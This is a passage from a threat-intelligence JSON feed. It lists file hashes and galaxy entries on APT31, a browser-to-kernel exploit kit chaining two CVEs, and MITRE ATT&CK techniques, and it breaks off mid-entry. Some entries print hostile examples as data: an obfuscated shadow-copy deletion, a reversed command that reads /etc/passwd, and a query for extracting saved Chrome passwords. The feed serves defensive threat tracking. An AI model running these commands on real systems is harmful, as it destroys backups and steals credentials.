"65344bd4db6e0fc48a1760802e354d1c2bc54ba1"}, {"type": "sha256", "value": "295fc584f75e94108c9be945977db33ed80421f5d374eab188587c911dffd915"}, {"type": "md5", "value": "e8c73c5079ad31accc19fb9814f074f6"}, {"type": "sha1", "value": "0dd7d1de665cee8c104ee95ddb7a721274bca6c5"}, {"type": "sha256", "value": "bc7d24f5cf8937b334966201bdcce8ca9bab6ec5889d40a399d4094dcad73360"}, {"type": "sha256", "value": "b34802a646fc4a8f07ffa09a5fda8bf7327446b22e3d7bb5163dafa1e2a8bb2b"}, {"type": "sha256", "value": "8453c42904b7b2fea5671b7bff06b2d937632ae29545fd11bc13095627a2805f"}, {"type": "md5", "value": "758235724135900a587181eafa3bf71b"}, {"type": "sha1", "value": "4560a8881292c74b7da7cb1cabbd800d678b603d"}, {"type": "sha256", "value": "f3c64014221a58f3fde88e562662dbd5a1b3dd2b59c86e9e2bc5cb8f671664e7"}, {"type": "md5", "value": "787fc1e6e741a36cfd41e0827f6c60a5"}, {"type": "sha1", "value": "c9d43948197d0ea6eb66e429886add687b37c9d5"}, {"type": "sha256", "value": "87b6b24c06f99900a8aa579caedee1e402015884c925a98dcfb0fb38dfa2de22"}, {"type": "sha256", "value": "ac6bbc4b1f1c62e308781329183a46e18f454c27e66bffa09f343b53ac622b69"}, {"type": "md5", "value": "c4829eb928890da41ed16e66fa9e0146"}, {"type": "sha1", "value": "552a1e38e5bb9a9d5710d7f66c6fd903833dca3c"}, {"type": "sha256", "value": "ac6806c89e294f390838cb07c015dabec1c8ada06ce5161a0ad50b8a72828141"}, {"type": "sha256", "value": "3594ad58fb6217fafe9839e53999a90608c2e9f335fa20aece3d53f8c0802726"}, {"type": "md5", "value": "970fccf341fb787630e543deccbd68e2"}, {"type": "sha1", "value": "7016cbd7fdd1904a5928c6b1dfff07890ad83149"}, {"type": "md5", "value": "edf970a7c8c46d10b46dbe60dd281d0c"}, {"type": "sha1", "value": "b46e801faf0488f0c6a94ce5e6a9d8ba1efdae96"}, {"type": "sha256", "value": "3ec3151d8d1278ed966941ac89ea495ef6a80c70613dd9138cc85fc28c9df432"}, {"type": "sha256", "value": "6e6378d8d404166da89d982e80bc52e19a3f677201258dec1775f100a027a92d"}, {"type": "md5", "value": "640a33397716cad130d8877ac7ecb869"}, {"type": "sha1", "value": "c4b628c1adceaee881bc24dcceb38c81f9165dab"}], "galaxies": [{"id": "c11625b4-6de3-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-24T15:25:55.000Z", "name": "Aerospace"}, {"id": "cd39a0de-6899-4fc0-b6f8-7223e411559c", "category": "trellix-threat-actor", "description": "APT31 targets diverse sectors including law firms, managed service providers, governments, and political organizations. Active since at least 2016, the group's main objective is stealing sensitive information, particularly intellectual property. To achieve this, the actor employs a variety of tools like Gh0st RAT, PlugX, 9002 RAT, HiKit, China Chopper, Sakula RAT, DropboxAES RAT, and Trochilus RAT.", "created_on": "2021-07-21T16:09:36.000Z", "name": "APT31"}, {"id": "87df7cd8-a378-4c40-a671-3cfd1307cab8", "category": "mitre-attack-pattern", "description": "Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks, including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI) \n\nFor example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI) Finally, AI-generated text, images, audio, and video may be used for fraud, [Impersonation](https://attack.mitre.org/techniques/T1656), and other malicious activities.(Citation: Google-Vishing24)(Citation: IC3-AI24)(Citation: WSJ-Vishing-AI24)\n", "created_on": "2024-06-27T21:12:25.000Z", "name": "Artificial Intelligence"}, {"id": "bebe798e-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ", "created_on": "2020-12-03T03:00:48.000Z", "name": "Bidirectional Communication"}, {"id": "c9996e62-c5b1-4b0f-9971-53cced53f23d", "category": "trellix-tool", "description": "The BlueMoon Exploit Kit functions by chaining together three specific security flaws to compromise target systems. It begins by leveraging a type confusion vulnerability in the V8 JavaScript engine of Chromium browsers, identified as CVE-2026-85046, to execute initial remote code. It then bypasses the internal security boundaries of the browser through a V8 sandbox escape. Finally, the attack escapes the browser renderer process entirely by exploiting CVE-2026-85880, a zero day local privilege escalation flaw in the Windows kernel present on older operating system builds.e", "created_on": "2026-09-10T00:12:17.000Z", "name": "BlueMoon Exploit Kit"}, {"id": "6345b300-ad7b-11ea-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)\n\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.\n\nPrevious to macOS 11, adversaries could silently install browser extensions via the command line using the <code>profiles</code> tool to install malicious <code>.mobileconfig</code> files. In macOS 11+, the use of the <code>profiles</code> tool can no longer install configuration profiles, however <code>.mobileconfig</code> files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)\n\nOnce the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)\n\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Defense Evasion](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek) ", "created_on": "2020-06-13T13:40:04.000Z", "name": "Browser Extensions"}, {"id": "ffb397c1-ad7a-11ea-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)\n\nBrowser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)", "created_on": "2020-06-13T13:37:17.000Z", "name": "Browser Information Discovery"}, {"id": "27ebfa26-ae47-11ea-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)\n\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as <code>SeDebugPrivilege</code> and/or high-integrity/administrator rights.\n\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)", "created_on": "2020-06-14T13:58:42.000Z", "name": "Browser Session Hijacking"}, {"id": "393f698e-0bb9-46de-9d23-b534756ce5bf", "category": "trellix-tool", "description": "Cloudflare R2 is an object storage service that lets developers store large volumes of unstructured data, such as images, videos, and documents. Its primary advantage is the elimination of egress fees, which are the costs typically charged by other cloud providers when data is downloaded or accessed. This makes R2 a cost-effective solution for applications that involve frequent data retrieval.", "created_on": "2024-11-19T22:15:36.000Z", "name": "Cloudflare R2 Storage"}, {"id": "9c2c9e43-65c5-444f-817e-053c9267e1ba", "category": "trellix-tool", "description": "Cloudflare Workers is a serverless platform that allows developers to run JavaScript, TypeScript, Python, or other supported code directly on Cloudflare's global network. Instead of relying on a centralized server, Workers execute applications at the edge, closer to end-users, improving performance, reducing latency, and enhancing scalability.", "created_on": "2024-12-19T22:14:31.000Z", "name": "Cloudflare Workers"}, {"id": "9986a745-c546-4cf3-85d9-44e26d098af0", "category": "trellix-tool", "description": "Windows command interpreter, Cmd.exe. If used without parameters, cmd displays the version and copyright information of the operating system. Source: Microsoft", "created_on": "2021-08-04T21:00:38.000Z", "name": "Cmd"}, {"id": "6b646d82-f30c-4494-8f19-f7f70c689d6f", "category": "mitre-attack-pattern", "description": "Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)\n\nFor example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing,  `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`\u201cWor\u201d+\u201cd.Application\u201d`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)\n\nAdversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\\voi\\pcw\\..\\..\\Windows\\tei\\qs\\k\\..\\..\\..\\system32\\erool\\..\\wbem\\wg\\je\\..\\..\\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)\n\nTools such as <code>Invoke-Obfuscation</code> and <code>Invoke-DOSfucation</code> have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)", "created_on": "2023-06-12T21:12:23.000Z", "name": "Command Obfuscation"}, {"id": "8ae26752-964d-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-15T01:43:57.000Z", "name": "Consulting"}, {"id": "2a2c7d3e-3575-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, <code>AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data</code> and executing a SQL query: <code>SELECT action_url, username_value, password_value FROM logins;</code>. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function <code>CryptUnprotectData</code>, which uses the victim\u2019s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).", "created_on": "2020-12-03T14:38:09.000Z", "name": "Credentials from Web Browsers"}, {"id": "516bd65c-cca7-4777-ad7d-b29be88dd809", "category": "trellix-tool", "description": "Curl is a command-line tool for transferring data specified with URL syntax.\r\nSource: https://github.com/curl/curl", "created_on": "2021-10-27T15:57:11.000Z", "name": "curl"}, {"id": "741b57aa-a5f2-40cb-965f-f2e6adaee0e3", "category": "trellix-cve-database", "description": "Type confusion in V8 in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)", "created_on": "2026-09-10T00:12:17.000Z", "name": "CVE-2026-85046"}, {"id": "7aa0181d-d751-4163-b2aa-23e765d7fdbf", "category": "trellix-cve-database", "description": "Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.", "created_on": "2026-09-10T00:12:17.000Z", "name": "CVE-2026-85880"}, {"id": "c416f2ea-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n", "created_on": "2020-02-26T13:49:10.000Z", "name": "Data from Local System"}, {"id": "c3dcf574-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> or <code>type</code> command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)(Citation: Sentinel One Tainted Love 2023)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016)", "created_on": "2020-02-26T13:49:10.000Z", "name": "Deobfuscate/Decode Files or Information"}, {"id": "eafe3771-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may trigger a denial-of-service attack via legitimate system processes. It has been previously observed that the Windows Time Travel Debugging (TTD) monitor driver can be used to initiate a debugging session for a security tool (e.g., an EDR) and render the tool non-functional.  By hooking the debugger into the EDR process, all child processes from the EDR will be automatically suspended. The attacker can terminate any EDR helper processes (unprotected by Windows Protected Process Light) by abusing the Process Explorer driver. In combination this will halt any attempt to restart services and cause the tool to crash.(Citation: Cocomazzi FIN7 Reboot)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) For example, adversaries may abuse the Windows process mitigation policy to block certain endpoint detection and response (EDR) products from loading their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON attribute using API calls like UpdateProcThreadAttribute, adversaries may evade detection by endpoint security solutions that rely on DLLs that are not signed by Microsoft. Alternatively, they may add new directories to an EDR tool\u2019s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)\n\nAdversaries may also focus on specific applications such as Sysmon. For example, the \u201cStart\u201d and \u201cEnable\u201d values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)", "created_on": "2020-11-20T22:08:28.000Z", "name": "Disable or Modify Tools"}, {"id": "e8fa47be-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).\n\nSide-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)", "created_on": "2020-11-20T22:08:24.000Z", "name": "DLL Side-Loading"}, {"id": "bbd2ba02-39ca-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nThe DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)\n\nDNS beaconing may be used to send commands to remote systems via DNS queries. A DNS beacon is created by tunneling DNS traffic (i.e.\u202f[Protocol Tunneling](https://attack.mitre.org/techniques/T1572)). The commands may be embedded into different DNS records, for example, TXT or A records.(Citation: OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government) DNS beacons may be difficult to detect because the beacons infrequently communicate with infected devices.(Citation: DNS Beacons) Infrequent communication conceals the malicious DNS traffic with normal DNS traffic. ", "created_on": "2020-12-09T03:00:46.000Z", "name": "DNS"}, {"id": "7832dd67-ae89-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute \"IDN homograph attacks,\" creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)\n\nDifferent URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)\n\nAdversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)\n\nDomain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)\n\nIn addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor\u2019s choosing.(Citation: Invictus IR DangerDev 2024)", "created_on": "2021-05-06T16:38:21.000Z", "name": "Domains"}, {"id": "c3acd5ab-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:\n\n* A legitimate website is compromised, allowing adversaries to inject malicious code\n* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary\n* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))\n* Built-in web application interfaces that allow user-controllable content are leveraged for the insertion of malicious scripts or iFrames (e.g., cross-site scripting)\n\nBrowser push notifications may also be abused by adversaries and leveraged for malicious code injection via [User Execution](https://attack.mitre.org/techniques/T1204). By clicking \"allow\" on browser push notifications, users may be granting a website permission to run JavaScript code on their browser.(Citation: Push notifications - viruspositive)(Citation: push notification -mcafee)(Citation: push notifications - malwarebytes)\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or a particular region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. The user may be required to assist in this process by enabling scripting, notifications, or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, the adversary will gain code execution on the user's system unless other protections are in place. In some cases, a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.", "created_on": "2020-02-26T13:49:09.000Z", "name": "Drive-by Compromise"}, {"id": "b0255f7e-aed9-4991-a7ac-860c13f09c05", "category": "mitre-attack-pattern", "description": "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) \n\nAdversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) \n\nFor example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) \n\nEmbedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)", "created_on": "2022-12-09T22:12:46.000Z", "name": "Embedded Payloads"}, {"id": "aeddd759-fd26-4ad5-9a59-356196e62972", "category": "mitre-attack-pattern", "description": "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.\n\nThis type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.\n\nThe entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.\n\nFor example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) \n\nAdversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.", "created_on": "2024-05-23T21:13:59.000Z", "name": "Encrypted/Encoded File"}, {"id": "c4976d05-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", "created_on": "2020-02-26T13:49:11.000Z", "name": "Exfiltration Over C2 Channel"}, {"id": "c37d7a3d-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### 